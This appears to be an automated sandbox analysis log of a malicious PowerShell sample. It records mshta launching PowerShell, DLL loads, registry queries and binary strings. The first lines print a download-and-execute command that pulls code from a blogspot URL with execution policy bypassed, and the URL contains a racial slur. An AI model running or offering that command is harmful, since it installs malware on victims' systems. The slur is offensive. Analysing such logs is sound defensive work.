Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: atomxml.ps1

Static file information: File size 4951516 > 1048576

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:	Binary string: wkernel32.pdb source: fontdrvhost.exe, 00000010.00000003.2386308129.00000000058A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385925161.0000000005780000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: fontdrvhost.exe, 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: fontdrvhost.exe, 00000010.00000003.2382164781.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2384235325.0000000005970000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2384894357.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385208368.0000000005920000.00000004.00000001.00020000.00000000.sdmp
